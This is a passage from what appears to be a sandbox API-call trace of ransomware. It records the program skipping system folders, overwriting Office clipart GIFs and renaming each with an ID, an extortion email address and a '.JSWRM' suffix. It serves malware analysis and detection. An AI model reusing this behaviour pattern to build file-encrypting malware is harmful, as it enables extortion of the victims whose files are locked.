lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00120_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00120_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0073.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00120_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00120_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00120_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.465] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3484) returned 1 [0073.465] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd90) returned 0x24c1d0 [0073.465] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xd90, lpOverlapped=0x0) returned 1 [0073.467] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.467] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xd90, lpOverlapped=0x0) returned 1 [0073.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.467] CloseHandle (hObject=0x460) returned 1 [0073.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0073.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0073.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0073.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0073.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0073.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0073.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.468] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00126_.GIF", cAlternateFileName="")) returned 1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2=".") returned 1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="..") returned 1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="...") returned 1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="windows") returned -1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="recovery") returned -1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="perflogs") returned -1 [0073.468] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="documents and settings") returned -1 [0073.469] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.469] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="system volume information") returned -1 [0073.469] lstrcmpiW (lpString1="AG00126_.GIF", lpString2="msocache") returned -1 [0073.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0073.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00126_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00126_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00126_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0073.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0073.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00126_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00126_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00126_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0073.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.469] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3140) returned 1 [0073.469] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc40) returned 0x24c1d0 [0073.470] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0073.544] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.545] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0073.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.545] CloseHandle (hObject=0x460) returned 1 [0073.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0073.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0073.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0073.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0073.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0073.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.545] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0073.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.546] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00129_.GIF", cAlternateFileName="")) returned 1 [0073.546] lstrcmpiW (lpString1="AG00129_.GIF", lpString2=".") returned 1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="..") returned 1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="...") returned 1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="windows") returned -1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="recovery") returned -1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="perflogs") returned -1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="documents and settings") returned -1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="system volume information") returned -1 [0073.547] lstrcmpiW (lpString1="AG00129_.GIF", lpString2="msocache") returned -1 [0073.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00129_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00129_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00129_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00129_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00129_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00129_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.548] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12482) returned 1 [0073.548] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30c0) returned 0x24c1d0 [0073.548] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x30c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x30c0, lpOverlapped=0x0) returned 1 [0073.558] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.558] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x30c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x30c0, lpOverlapped=0x0) returned 1 [0073.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.558] CloseHandle (hObject=0x460) returned 1 [0073.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0073.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0073.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0073.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.559] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0073.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.560] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1485, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00130_.GIF", cAlternateFileName="")) returned 1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2=".") returned 1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="..") returned 1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="...") returned 1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="windows") returned -1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="recovery") returned -1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="perflogs") returned -1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="documents and settings") returned -1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="system volume information") returned -1 [0073.560] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="msocache") returned -1 [0073.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00130_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00130_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00130_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00130_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00130_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00130_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 